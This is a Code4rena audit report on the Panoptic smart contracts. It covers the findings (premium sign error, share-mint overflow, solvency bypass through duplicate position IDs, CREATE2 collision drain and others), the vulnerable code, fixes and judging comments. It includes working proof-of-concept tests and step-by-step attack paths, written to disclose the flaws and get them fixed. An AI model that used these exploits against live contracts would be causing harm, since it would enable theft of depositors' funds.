sponsor | slug | date | title | findings | contest |
---|---|---|---|---|---|
Panoptic |
2024-04-panoptic |
2024-05-⭕ |
Panoptic |
354 |
Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.
A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.
During the audit outlined in this document, C4 conducted an analysis of the Panoptic smart contract system written in Solidity. The audit took place between April 1—April 22 2024.
60 Wardens contributed reports to Panoptic:
- 0xLogos
- bin2chen
- KupiaSec
- rbserver
- Kalogerone
- 0xdice91
- pkqs90
- petro_1912
- Aymen0909
- 0xStalin
- DanielArmstrong
- Joshuajee
- JecikPo
- Udsen
- FastChecker
- DadeKuma
- Dup1337 (ChaseTheLight, sorrynotsorry, and deliriusz)
- Bauchibred
- sammy
- jesjupyter
- 99Crits
- favelanky
- cheatc0d3
- slvDev
- bareli
- Rolezn
- hihen
- ZanyBonzy
- albahaca
- radin100
- Naresh
- Vancelot
- grearlake
- d3e4
- zabihullahazadzoi
- John_Femi
- lanrebayode77
- jasonxiale
- satoshispeedrunner
- CodeWasp (slylandro_star, kuprum, audithare, and spaghetticode_sentinel)
- pfapostol
- Rhaydden
- blockchainbuttonmasher
- mining_mario
- twcctop
- 0xhacksmithh
- K42
- Topmark
- lsaudit
- lirezArAzAvi
- crc32
- codeslide
- oualidpro
- Sathish9098
- IllIllI
This audit was judged by Picodes.
Final report assembled by liveactionllama.
The C4 analysis yielded an aggregated total of 11 unique vulnerabilities. Of these vulnerabilities, 2 received a risk rating in the category of HIGH severity and 9 received a risk rating in the category of MEDIUM severity.
Additionally, C4 analysis included 43 reports detailing issues with a risk rating of LOW severity or non-critical.
All of the issues presented here are linked back to their original finding.
The code under review can be found within the C4 Panoptic repository, and is composed of 2 interfaces and 18 smart contracts written in the Solidity programming language and includes 4,921 lines of Solidity code.
C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.
High-level considerations for vulnerabilities span the following key areas when conducting assessments:
- Malicious Input Handling
- Escalation of privileges
- Arithmetic
- Gas use
For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.
Submitted by pkqs90, also found by bin2chen, Aymen0909, 0xStalin, JecikPo, and DanielArmstrong
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1621-L1640
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L1043-L1089
SettleLongPremium
is the function intended to settle premiums for long option holders. When called, it should deduct the premium from the option owner's account, but the current implementation adds the premium instead.
Let's see the code for premium calculation. We can see that accumulatedPremium
and s_options[owner][tokenId][legIndex]
are premium accumulators for calculating the owed amount of premium, and that accumulatedPremium
is a LeftRightUnsigned type, which means it must be positive.
The realizedPremia
is also positive, because it is calculated by accumulatedPremium * liquidity
.
The issue occurs when calling s_collateralToken.exercise()
. The realizedPremia
that is passed inside should be negative instead of positive, because negative means user pays premia, and positive means user receives premia. The current implementation is incorrect.
PanopticPool.sol
accumulatedPremium = LeftRightUnsigned
.wrap(0)
.toRightSlot(premiumAccumulator0)
.toLeftSlot(premiumAccumulator1);
// update the premium accumulator for the long position to the latest value
// (the entire premia delta will be settled)
LeftRightUnsigned premiumAccumulatorsLast = s_options[owner][tokenId][legIndex];
s_options[owner][tokenId][legIndex] = accumulatedPremium;
> accumulatedPremium = accumulatedPremium.sub(premiumAccumulatorsLast);
}
uint256 liquidity = PanopticMath
.getLiquidityChunk(tokenId, legIndex, s_positionBalance[owner][tokenId].rightSlot())
.liquidity();
unchecked {
// update the realized premia
> LeftRightSigned realizedPremia = LeftRightSigned
> .wrap(0)
> .toRightSlot(int128(int256((accumulatedPremium.rightSlot() * liquidity) / 2 ** 64)))
> .toLeftSlot(int128(int256((accumulatedPremium.leftSlot() * liquidity) / 2 ** 64)));
// deduct the paid premium tokens from the owner's balance and add them to the cumulative settled token delta
s_collateralToken0.exercise(owner, 0, 0, 0, realizedPremia.rightSlot());
s_collateralToken1.exercise(owner, 0, 0, 0, realizedPremia.leftSlot());
CollateralTracker.sol
function exercise(
address optionOwner,
int128 longAmount,
int128 shortAmount,
int128 swappedAmount,
int128 realizedPremium
) external onlyPanopticPool returns (int128) {
unchecked {
// current available assets belonging to PLPs (updated after settlement) excluding any premium paid
int256 updatedAssets = int256(uint256(s_poolAssets)) - swappedAmount;
// add premium to be paid/collected on position close
> int256 tokenToPay = -realizedPremium;
// if burning ITM and swap occurred, compute tokens to be paid through exercise and add swap fees
int256 intrinsicValue = swappedAmount - (longAmount - shortAmount);
if ((intrinsicValue != 0) && ((shortAmount != 0) || (longAmount != 0))) {
// intrinsic value is the amount that need to be exchanged due to burning in-the-money
// add the intrinsic value to the tokenToPay
tokenToPay += intrinsicValue;
}
> if (tokenToPay > 0) {
// if user must pay tokens, burn them from user balance (revert if balance too small)
uint256 sharesToBurn = Math.mulDivRoundingUp(
uint256(tokenToPay),
totalSupply,
totalAssets()
);
_burn(optionOwner, sharesToBurn);
> } else if (tokenToPay < 0) {
// if user must receive tokens, mint them
uint256 sharesToMint = convertToShares(uint256(-tokenToPay));
_mint(optionOwner, sharesToMint);
}
We can also see from unit test test_success_settleLongPremium
: The tests checks that after calling settleLongPremium
, the assets of Buyer[0]
actually increases instead of decreases, which is obviously incorrect.
assetsBefore0 = ct0.convertToAssets(ct0.balanceOf(Buyers[0]));
assetsBefore1 = ct1.convertToAssets(ct1.balanceOf(Buyers[0]));
// collect buyer 1's three relevant chunks
for (uint256 i = 0; i < 3; ++i) {
pp.settleLongPremium(collateralIdLists[i], Buyers[0], 0);
}
assertEq(
ct0.convertToAssets(ct0.balanceOf(Buyers[0])) - assetsBefore0,
33_342,
"Incorrect Buyer 1 1st Collect 0"
);
Take the negative of realizedPremia
before calling s_collateralToken.exercise()
.
dyedm1 (Panoptic) confirmed via duplicate issue #376
Keeping High severity as funds are at stake.
Submitted by 0xLogos
Malicious actors can mint huge amounts of shares for free and then withdraw all collateral.
In the mint
function user-controlled shares
parameter goes right away to the previewMint
function which then calculates required assets in unchecked block. If the shares
value is high enough, overflow in shares * DECIMALS
will occur, and assets
will be very low.
function previewMint(uint shares) public view returns (uint assets) {
unchecked {
assets = Math.mulDivRoundingUp(
shares * DECIMALS, totalAssets(), totalSupply * (DECIMALS - COMMISSION_FEE)
);
}
}
function mint(uint shares, address receiver) external returns (uint assets) {
assets = previewMint(shares);
if (assets > type(uint104).max) revert Errors.DepositTooLarge();
...
}
Insert the following snippet to ColalteralTracker.t.sol for coded PoC:
function test_poc1(uint256 x) public {
_initWorld(x);
_grantTokens(Bob);
vm.startPrank(Bob);
uint shares = type(uint).max / 10000 + 1;
IERC20Partial(token0).approve(address(collateralToken0), type(uint256).max);
uint256 returnedAssets0 = collateralToken0.mint(shares, Bob);
assertEq(shares, collateralToken0.balanceOf(Bob));
assertEq(returnedAssets0, 1);
}
Remove unchecked block.
function maxMint(address) external view returns (uint maxShares) {
return (convertToShares(type(uint104).max) * DECIMALS) / (DECIMALS + COMMISSION_FEE);
}
Under/Overflow
[M-01] PanopticFactory
uses spot price when deploying new pools, resulting in liquidity manipulation when minting
Submitted by DadeKuma, also found by sammy, Dup1337, Bauchibred, jesjupyter, and Vancelot
When deployNewPool
is called it uses the spot price of the pool, which can be manipulated through a flashloan and thus could return a highly inaccurate result.
The price is used when deciding how much liquidity should be minted for each token, so this can result in an unbalanced pool.
In other parts of the code, this is not an issue as there are oracles that prevent price manipulations, but in case there aren't any checks to avoid so.
The spot price is used to calculate the range liquidity for each token:
@> (uint160 currentSqrtPriceX96, , , , , , ) = v3Pool.slot0();
// For full range: L = Δx * sqrt(P) = Δy / sqrt(P)
// We start with fixed token amounts and apply this equation to calculate the liquidity
// Note that for pools with a tickSpacing that is not a power of 2 or greater than 8 (887272 % ts != 0),
// a position at the maximum and minimum allowable ticks will be wide, but not necessarily full-range.
// In this case, the `fullRangeLiquidity` will always be an underestimate in respect to the token amounts required to mint.
uint128 fullRangeLiquidity;
unchecked {
// Since we know one of the tokens is WETH, we simply add 0.1 ETH + worth in tokens
if (token0 == WETH) {
fullRangeLiquidity = uint128(
@> Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_WETH, currentSqrtPriceX96)
);
} else if (token1 == WETH) {
fullRangeLiquidity = uint128(
Math.mulDivRoundingUp(
FULL_RANGE_LIQUIDITY_AMOUNT_WETH,
Constants.FP96,
@> currentSqrtPriceX96
)
);
} else {
// Find the resulting liquidity for providing 1e6 of both tokens
uint128 liquidity0 = uint128(
@> Math.mulDiv96RoundingUp(FULL_RANGE_LIQUIDITY_AMOUNT_TOKEN, currentSqrtPriceX96)
);
uint128 liquidity1 = uint128(
Math.mulDivRoundingUp(
FULL_RANGE_LIQUIDITY_AMOUNT_TOKEN,
Constants.FP96,
@> currentSqrtPriceX96
)
);
// Pick the greater of the liquidities - i.e the more "expensive" option
// This ensures that the liquidity added is sufficiently large
fullRangeLiquidity = liquidity0 > liquidity1 ? liquidity0 : liquidity1;
}
}
But unlike other parts of the code, the PanopticFactory
doesn't have any checks against the price (it doesn't use any oracles nor the TWAP), so each token liquidity is manipulable through flash loans.
Consider using the TWAP price instead of the spot price.
Uniswap
dyedm1 (Panoptic) disputed and commented:
True, but I don't see negative consequences for this? This function is just a way to add some full-range liquidity to the pool so the entire range can be swapped across, and depending on the tokens we can add very small/large amounts of liquidity anyway (mentioned in the readme: Depending on the token, the amount of funds required for the initial factory deployment may be high or unrealistic)
@dyedm1 - assuming the deployer has infinite approvals, can't we imagine a scenario where, by manipulating the spot pool price, it ends up depositing way too many token1 and getting sandwiched leading to a significant loss?
Said differently, the risk is that currently the deployer has no control over the amount of token1 he will donate and this amount can be manipulated by an attacker.
Picodes (judge) decreased severity to Medium and commented:
This is at most Medium to me considering pool deployers are advanced users and you need to deploy a pool where the manipulation cost is low which should remain exceptional.
Yeah I agree this might be less than ideal if you have infinite approvals. Our UI doesn't do infinite approvals to the factory, but some wallets allow users to edit the approval amount before signing the transaction, so it might be prudent to add slippage checks here (to make the process idiot-proof).
[M-02] _validatePositionList()
does not check for duplicate tokenIds, allowing attackers to bypass solvency checks
Submitted by pkqs90, also found by Udsen, 0xLogos, and bin2chen
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1367-L1391
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L887-L893
The underlying issue is that _validatePositionList()
does not check for duplicate tokenIds. Attackers can use this issue to bypass solvency checks, which leads to several impacts:
- Users can mint/burn/liquidate/forceExercise when they are insolvent.
- Users can settleLongPremium/forceExercise another user when the other user is insolvent.
This also conflicts a main invariant stated in audit readme: Users should not be allowed to mint/burn options or pay premium if their end state is insolvent
.
First, let's see why _validatePositionList
does not check for duplicate tokenIds. For a user position hash, the first 8 bits is the length of tokenIds which overflows, last 248 bits is the xor hash. However, we can easily add 256 tokenIds of the same kind to create a duplicate positionHash.
For example: Hash(key0, key1, key2) == Hash(key0, key1, key2, key0, key0, ..., 256 more key0)
. This way, we can add any tokenId we want while still arriving the same position hash.
PanopticPool.sol
function _validatePositionList(
address account,
TokenId[] calldata positionIdList,
uint256 offset
) internal view {
uint256 pLength;
uint256 currentHash = s_positionsHash[account];
unchecked {
pLength = positionIdList.length - offset;
}
// note that if pLength == 0 even if a user has existing position(s) the below will fail b/c the fingerprints will mismatch
// Check that position hash (the fingerprint of option positions) matches the one stored for the '_account'
uint256 fingerprintIncomingList;
for (uint256 i = 0; i < pLength; ) {
> fingerprintIncomingList = PanopticMath.updatePositionsHash(
fingerprintIncomingList,
positionIdList[i],
ADD
);
unchecked {
++i;
}
}
// revert if fingerprint for provided '_positionIdList' does not match the one stored for the '_account'
if (fingerprintIncomingList != currentHash) revert Errors.InputListFail();
}
PanopticMath.sol
function updatePositionsHash(
uint256 existingHash,
TokenId tokenId,
bool addFlag
) internal pure returns (uint256) {
// add the XOR`ed hash of the single option position `tokenId` to the `existingHash`
// @dev 0 ^ x = x
unchecked {
// update hash by taking the XOR of the new tokenId
uint248 updatedHash = uint248(existingHash) ^
(uint248(uint256(keccak256(abi.encode(tokenId)))));
// increment the top 8 bit if addflag=true, decrement otherwise
return
addFlag
? uint256(updatedHash) + (((existingHash >> 248) + 1) << 248)
: uint256(updatedHash) + (((existingHash >> 248) - 1) << 248);
}
}
Then, let's see how duplicate ids can bypass solvency check. The solvency check is in _validateSolvency()
, which is called by all the user interaction functions, such as mint/burn/liquidate/forceExercise/settleLongPremium. This function first checks for a user passed in positionIdList
(which we already proved can include duplicates), then calls _checkSolvencyAtTick()
to calculate the balanceCross
(collateral balance) and thresholdCross
(required collateral) for all tokens.
The key is the collateral balance includes the premium that is collected for each of the positions. For most of the positions, the collected premium should be less than required collateral to keep this position open. However, if a position has been open for a long enough time, the fees it accumulated may be larger than required collateral.
For this kind of position, we can duplicate it 256 times (or multiple of 256 times, as long as gas fee is enough), and make our collateral balance grow faster than required collateral. This can make a insolvent account "solvent", by duplicating the key tokenId multiple times.
function _validateSolvency(
address user,
TokenId[] calldata positionIdList,
uint256 buffer
) internal view returns (uint256 medianData) {
// check that the provided positionIdList matches the positions in memory
> _validatePositionList(user, positionIdList, 0);
...
// Check the user's solvency at the fast tick; revert if not solvent
bool solventAtFast = _checkSolvencyAtTick(
user,
positionIdList,
currentTick,
fastOracleTick,
buffer
);
if (!solventAtFast) revert Errors.NotEnoughCollateral();
// If one of the ticks is too stale, we fall back to the more conservative tick, i.e, the user must be solvent at both the fast and slow oracle ticks.
if (Math.abs(int256(fastOracleTick) - slowOracleTick) > MAX_SLOW_FAST_DELTA)
if (!_checkSolvencyAtTick(user, positionIdList, currentTick, slowOracleTick, buffer))
revert Errors.NotEnoughCollateral();
}
function _checkSolvencyAtTick(
address account,
TokenId[] calldata positionIdList,
int24 currentTick,
int24 atTick,
uint256 buffer
) internal view returns (bool) {
(
LeftRightSigned portfolioPremium,
uint256[2][] memory positionBalanceArray
) = _calculateAccumulatedPremia(
account,
positionIdList,
COMPUTE_ALL_PREMIA,
ONLY_AVAILABLE_PREMIUM,
currentTick
);
LeftRightUnsigned tokenData0 = s_collateralToken0.getAccountMarginDetails(
account,
atTick,
positionBalanceArray,
portfolioPremium.rightSlot()
);
LeftRightUnsigned tokenData1 = s_collateralToken1.getAccountMarginDetails(
account,
atTick,
positionBalanceArray,
portfolioPremium.leftSlot()
);
(uint256 balanceCross, uint256 thresholdCross) = _getSolvencyBalances(
tokenData0,
tokenData1,
Math.getSqrtRatioAtTick(atTick)
);
// compare balance and required tokens, can use unsafe div because denominator is always nonzero
unchecked {
return balanceCross >= Math.unsafeDivRoundingUp(thresholdCross * buffer, 10_000);
}
}
CollateralTracker.sol
function getAccountMarginDetails(
address user,
int24 currentTick,
uint256[2][] memory positionBalanceArray,
int128 premiumAllPositions
) public view returns (LeftRightUnsigned tokenData) {
tokenData = _getAccountMargin(user, currentTick, positionBalanceArray, premiumAllPositions);
}
function _getAccountMargin(
address user,
int24 atTick,
uint256[2][] memory positionBalanceArray,
int128 premiumAllPositions
) internal view returns (LeftRightUnsigned tokenData) {
uint256 tokenRequired;
// if the account has active options, compute the required collateral to keep account in good health
if (positionBalanceArray.length > 0) {
// get all collateral required for the incoming list of positions
tokenRequired = _getTotalRequiredCollateral(atTick, positionBalanceArray);
// If premium is negative (ie. user has to pay for their purchased options), add this long premium to the token requirement
if (premiumAllPositions < 0) {
unchecked {
tokenRequired += uint128(-premiumAllPositions);
}
}
}
// if premium is positive (ie. user will receive funds due to selling options), add this premum to the user's balance
uint256 netBalance = convertToAssets(balanceOf[user]);
if (premiumAllPositions > 0) {
unchecked {
netBalance += uint256(uint128(premiumAllPositions));
}
}
// store assetBalance and tokens required in tokenData variable
tokenData = tokenData.toRightSlot(netBalance.toUint128()).toLeftSlot(
tokenRequired.toUint128()
);
return tokenData;
}
Now we have shown how to bypass the _validateSolvency()
, we can bypass all related checks. Listing them here:
In this report, we will only prove the core issue: duplicate tokenIds are allowed, and won't craft complicated scenarios for relevant impacts.
Add the following test code in PanopticPool.t.sol
, we can see that passing 257 of the same token ids can still work for mintOptions()
.
function test_duplicatePositionHash(
uint256 x,
uint256[2] memory widthSeeds,
int256[2] memory strikeSeeds,
uint256[2] memory positionSizeSeeds,
uint256 swapSizeSeed
) public {
_initPool(x);
(int24 width, int24 strike) = PositionUtils.getOTMSW(
widthSeeds[0],
strikeSeeds[0],
uint24(tickSpacing),
currentTick,
0
);
(int24 width2, int24 strike2) = PositionUtils.getOTMSW(
widthSeeds[1],
strikeSeeds[1],
uint24(tickSpacing),
currentTick,
0
);
vm.assume(width2 != width || strike2 != strike);
populatePositionData([width, width2], [strike, strike2], positionSizeSeeds);
// leg 1
TokenId tokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0, 1, isWETH, 0, 0, 0, strike, width
);
TokenId[] memory posIdList = new TokenId[](257);
for (uint i = 0; i < 257; ++i) {
posIdList[i] = tokenId;
}
pp.mintOptions(posIdList, positionSizes[0], 0, 0, 0);
}
Add a check in _validatePositionList
that the length is shorter than MAX_POSITIONS
(32).
Invalid Validation
Picodes (judge) decreased severity to Medium and commented:
I don't think here "liquidation bots not liquidating the insolvent position during a period of time" is an external requirement considering how critical liquidations are to Panoptic. My reasoning is that even if the loss of funds is not "direct", being able to properly control when positions can be opened is a key feature, and the fact that you can "increase your leverage" while being insolvent prevents proper risk control.
However, it's true that this is not strictly speaking a scenario where "assets can be stolen/lost/compromised directly" so I'll downgrade to Med.
Note: for full discussion, please see the original submission.
Submitted by Kalogerone
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticFactory.sol#L237
(NOTE: This report is very highly inspired from this past valid report. Necessary changes have been made to suit the Panoptic Protocol.)
The attack consists of two parts: Finding a collision, and actually draining the lending pool. We describe both here:
Note that in PanopticFactory::deployNewPool
, CREATE2
salt is user-supplied which is then passed to Clones::cloneDeterministic
:
function deployNewPool(address token0, address token1, uint24 fee, bytes32 salt)
external
returns (PanopticPool newPoolContract)
{
// sort the tokens, if necessary:
(token0, token1) = token0 < token1 ? (token0, token1) : (token1, token0);
.
.
.
// This creates a new Panoptic Pool (proxy to the PanopticPool implementation)
// Users can specify a salt, the aim is to incentivize the mining of addresses with leading zeros
@> newPoolContract = PanopticPool(POOL_REFERENCE.cloneDeterministic(salt));
.
.
.
}
function cloneDeterministic(address implementation, bytes32 salt) internal returns (address instance) {
/// @solidity memory-safe-assembly
assembly {
// Cleans the upper 96 bits of the `implementation` word, then packs the first 3 bytes
// of the `implementation` address with the bytecode before the address.
mstore(0x00, or(shr(0xe8, shl(0x60, implementation)), 0x3d602d80600a3d3981f3363d3d373d3d3d363d73000000))
// Packs the remaining 17 bytes of `implementation` with the bytecode after the address.
mstore(0x20, or(shl(0x78, implementation), 0x5af43d82803e903d91602b57fd5bf3))
@> instance := create2(0, 0x09, 0x37, salt)
}
require(instance != address(0), "ERC1167: create2 failed");
}
The address collision an attacker will need to find are:
- One undeployed Panoptic Pool address (1).
- Arbitrary attacker-controlled wallet contract (2).
Both sets of addresses can be brute-force searched because:
- As shown above,
salt
is a user-supplied parameter. By brute-forcing manysalt
values, we have obtained many different (undeployed) wallet accounts for (1). The user can know the address of the Panoptic Pool before deploying it, since as shown in the above code snippet, the result is deterministic. - (2) can be searched the same way. The contract just has to be deployed using
CREATE2
, and thesalt
is in the attacker's control by definition.
An attacker can find any single address collision between (1) and (2) with high probability of success using the following meet-in-the-middle technique, a classic brute-force-based attack in cryptography:
- Brute-force a sufficient number of values of salt (
2^80
), pre-compute the resulting account addresses, and efficiently store them e.g. in a Bloom filter data structure. - Brute-force contract pre-computation to find a collision with any address within the stored set in step 1.
The feasibility, as well as detailed technique and hardware requirements of finding a collision, are sufficiently described in multiple references:
- 1: A past issue on Sherlock describing this attack.
- 2: EIP-3607, which rationale is this exact attack. The EIP is in final state.
- 3: A blog post discussing the cost (money and time) of this exact attack.
The hashrate of the BTC network has reached 6.5 x 10^20
hashes per second as of time of writing, taking only just 31 minutes to achieve 2^80
hashes. A fraction of this computing power will still easily find a collision in a reasonably short timeline.
Even given EIP-3607 which disables an EOA if a contract is already deployed on top, we show that it's still possible to drain the Panoptic Pool entirely given a contract collision.
Assuming the attacker has already found an address collision against an undeployed Panoptic Pool, let's say 0xCOLLIDED
. The steps for complete draining of the Panoptic Pool are as follow:
First tx:
- Deploy the attack contract onto address
0xCOLLIDED
. - Set infinite allowance for {
0xCOLLIDED
---> attacker wallet} for any token they want. - Destroy the contract using
selfdestruct
.
Post Dencun hardfork, selfdestruct
is still possible if the contract was created in the same transaction. The only catch is that all 3 of these steps must be done in one tx.
The attacker now has complete control of any funds sent to 0xCOLLIDED
.
Second tx:
- Deploy the Panoptic Pool to
0xCOLLIDED
. - Wait until the Panoptic Pool will hold as many tokens as you want and drain it.
The attacker has stolen all funds from the Panoptic Pool.
Address collision can cause all tokens of a Panoptic Pool to be drain.
While we cannot provide an actual hash collision due to infrastructural constraints, we are able to provide a coded PoC to prove the following two properties of the EVM that would enable this attack:
- A contract can be deployed on top of an address that already had a contract before.
- By deploying a contract and self-destruct in the same tx, we are able to set allowance for an address that has no bytecode.
Here is the PoC, as well as detailed steps to recreate it:
- Paste the following file onto Remix (or a developing environment of choice): POC
- Deploy the contract
Test
. - Run the function
Test.test()
with a salt of your choice, and record the returned address. The result will be:Test.getAllowance()
for that address will return exactly APPROVE_AMOUNT.Test.getCodeSize()
for that address will return exactly zero.- This proves the second property.
- Using the same salt in step 3, run Test.test() again. The tx will go through, and the result will be:
Test.test()
returns the same address as with the first run.Test.getAllowance()
for that address will return twice of APPROVE_AMOUNT.Test.getCodeSize()
for that address will still return zero.- This proves the first property.
The provided PoC has been tested on Remix IDE, on the Remix VM - Mainnet fork environment, as well as testing locally on the Holesky testnet fork, which as of time of writing, has been upgraded with the Dencun hardfork.
Remix IDE
- Don't allow the user to control the
salt
used. - Consider also adding and encoding
block.timestamp
andblock.number
combined with the user'ssalt
. Then the attacker, after they successfully found a hash collision, already has to execute the attack at a fixed block and probably conspire with the sequencer to ensure that also the time is fixed.
dyedm1 (Panoptic) acknowledged and commented:
Technically true, but the cost to do this is enormous (with a likely minimal return, given that deposits would first have to be solicited into that pool), and we can add safeguards on the frontend to prevent this kind of attack.
This report is worth Medium severity to me, considering:
- that the attacker could target any pool playing on the salt
- that the attacker can wait for enough deposits before draining the pool
So it fulfills "hypothetical attack path with stated assumptions, but external requirements".
Submitted by KupiaSec
Because of incorrect validation, it allows option buyers not to pay premium.
When long leg is minted or short leg is burnt, the protocol checks liquidity spread by calculating TotalLiquidity / NetLiquidity
and allows it not exceed 9
.
However in the check function, the validation is ignored when NetLiquidity
is zero.
This means when a user mints long leg that buys whole selling amount, the liquidity spread is not checked.
This issue allows the option buyer not to pay premium, and here is why:
- When options are minted, last accumulated premium is stored to
s_grossPremiumLast
. Refer to_updateSettlementPostMint
function ofPanopticPool
contract. - When options are burned, new accumulated premium is fetched and calculates the premium by multiplying liquidity with difference in accumulated premium. Refer to
_updateSettlementPostBurn
function ofPanopticPool
contract. - However, when a long leg of T(total liquidity) amount is minted, N becomes zero.
- Later, when the minted long leg is burnt, premium values are not updated in SFPM, because N is zero. Refer to SFPM:L1085.
Since there is no difference in owed premium value, the option buyer will not pay the premium when burning the option.
When checking liquidity spread, it should revert when N is zero and T is positive:
+ if(netLiquidity == 0 && totalLiquidity > 0) revert;
if(netLiquidity == 0) return;
Context
Submitted by petro_1912, also found by Joshuajee
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L247-L251
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/CollateralTracker.sol#L261-L263
Swap commission is paid on the intrinsic value based on s_ITMSpreadFee
in CollateralTracker
contract.
If s_ITMSpreadFee
is zero, then swap commission can not be paid.
function startToken(
bool underlyingIsToken0,
address token0,
address token1,
uint24 fee,
PanopticPool panopticPool
) external {
__SNIP__
// cache the pool fee in basis points
uint24 _poolFee;
unchecked {
_poolFee = fee / 100; // @audit below fee 0.01%, then _poolFee = 0
}
s_poolFee = _poolFee;
...
__SNIP__
// Additional risk premium charged on intrinsic value of ITM positions
unchecked {
s_ITMSpreadFee = uint128((ITM_SPREAD_MULTIPLIER * _poolFee) / DECIMALS);
}
}
As you can see above code snippet, if fee(Uniswap fee) is below 100, then _poolFee and s_ITMSpreadFee can be zero.
Currently, there are no such pools that have below 0.01% fee on the UniswapV3.
But Uniswap fee level can be adjusted by the governance proposal like November 2021.
Here is the mention about it in Uniswap Protocol:
Uniswap v3 introduces multiple pools for each token pair, each with a different swapping fee. Liquidity providers may initially create pools at three fee levels: 0.05%, 0.30%, and 1%. More fee levels may be added by UNI governance, e.g. the 0.01% fee level added by this governance proposal in November 2021, as executed here.
https://dune.com/jcarnes/The-StableSwap-Wars
Competitions between Protocols like Uniswap and Carbon, more fee levels can be added in the future.
Indeed, there are several discussions on the less fee levels in stable coins pair.
https://gov.bancor.network/t/custom-taker-fee-on-stable-to-stable-trades/4370
- Carbon has a protocol wide fee of 20 BP (basis points).
- This fee, while appropriate for volatile pairs - is not in line with the market when it comes to stable to stable trades.
- For reference, Uniswap added a 1 BP fee option (0.01%) - in November 2021 (link)
- This proposal seeks to take this one step further and introduce a fee of 0.001% on stable to stable trades. This is 1/10th of a single basis point.
If protocol fee is less than 100 (i.e fee < 0.01 %), then PanopticPool's swap commission can not be taken.
Use Uniswap's DECIMALS (1e6) instead 10_000 and update all code related to DECIMALS.
Uniswap
This report shows how the current version of the protocol may not support all Uniswap V3 pools whereas the sponsor's label suggests it was their intention, so Medium severity seems appropriate under "broken functionality".
Submitted by bin2chen
s_grossPremiumLast[]
definitions are as follows:
/// @dev Per-chunk
last
value that gives the aggregate amount of premium owed to all sellers when multiplied by the total amount of liquiditytotalLiquidity
/// totalGrossPremium = totalLiquidity * (grossPremium(perLiquidityX64) - lastGrossPremium(perLiquidityX64)) / 2**64
/// Used to compute the denominator for the fraction of premium available to sellers to collect
/// LeftRight - right slot is token0, left slot is token1
mapping(bytes32 chunkKey => LeftRightUnsigned lastGrossPremium) internal s_grossPremiumLast;
A critical rule: if there is a change in totalLiquidity
, we must recalculate this value.
When Pool.mintOptions()
, s_grossPremiumLast[chunkKey]
will increase.
Step: mintOptions()
->_mintInSFPMAndUpdateCollateral()
->_updateSettlementPostMint()
function _updateSettlementPostMint(
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize
) internal {
...
if (tokenId.isLong(leg) == 0) {
LiquidityChunk liquidityChunk = PanopticMath.getLiquidityChunk(
tokenId,
leg,
positionSize
);
...
uint256[2] memory grossCurrent;
(grossCurrent[0], grossCurrent[1]) = SFPM.getAccountPremium(
address(s_univ3pool),
address(this),
tokenId.tokenType(leg),
liquidityChunk.tickLower(),
liquidityChunk.tickUpper(),
type(int24).max,
0
);
unchecked {
// L
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
// R
uint256 positionLiquidity = liquidityChunk.liquidity();
// T (totalLiquidity is (T + R) after minting)
uint256 totalLiquidityBefore = totalLiquidity - positionLiquidity;
@> s_grossPremiumLast[chunkKey] = LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
(grossCurrent[0] *
positionLiquidity +
grossPremiumLast.rightSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
)
.toLeftSlot(
uint128(
(grossCurrent[1] *
positionLiquidity +
grossPremiumLast.leftSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
);
}
}
}
}
When Pool.burnOptions()
,s_grossPremiumLast[chunkKey]
will decrease
burnOptions()
->_burnAndHandleExercise()
->_updateSettlementPostBurn()
function _updateSettlementPostBurn(
address owner,
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize,
bool commitLongSettled
) internal returns (LeftRightSigned realizedPremia, LeftRightSigned[4] memory premiaByLeg) {
...
uint256 numLegs = tokenId.countLegs();
uint256[2][4] memory premiumAccumulatorsByLeg;
// compute accumulated fees
(premiaByLeg, premiumAccumulatorsByLeg) = _getPremia(
tokenId,
positionSize,
owner,
COMPUTE_ALL_PREMIA,
type(int24).max
);
for (uint256 leg = 0; leg < numLegs; ) {
LeftRightSigned legPremia = premiaByLeg[leg];
bytes32 chunkKey = keccak256(
abi.encodePacked(tokenId.strike(leg), tokenId.width(leg), tokenId.tokenType(leg))
);
// collected from Uniswap
LeftRightUnsigned settledTokens = s_settledTokens[chunkKey].add(collectedByLeg[leg]);
@> if (LeftRightSigned.unwrap(legPremia) != 0) {
// (will be) paid by long legs
if (tokenId.isLong(leg) == 1) {
...
} else {
uint256 positionLiquidity = PanopticMath
.getLiquidityChunk(tokenId, leg, positionSize)
.liquidity();
// new totalLiquidity (total sold) = removedLiquidity + netLiquidity (T - R)
uint256 totalLiquidity = _getTotalLiquidity(tokenId, leg);
// T (totalLiquidity is (T - R) after burning)
uint256 totalLiquidityBefore = totalLiquidity + positionLiquidity;
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
LeftRightUnsigned availablePremium = _getAvailablePremium(
totalLiquidity + positionLiquidity,
settledTokens,
grossPremiumLast,
LeftRightUnsigned.wrap(uint256(LeftRightSigned.unwrap(legPremia))),
premiumAccumulatorsByLeg[leg]
);
// subtract settled tokens sent to seller
settledTokens = settledTokens.sub(availablePremium);
// add available premium to amount that should be settled
realizedPremia = realizedPremia.add(
LeftRightSigned.wrap(int256(LeftRightUnsigned.unwrap(availablePremium)))
);
...
unchecked {
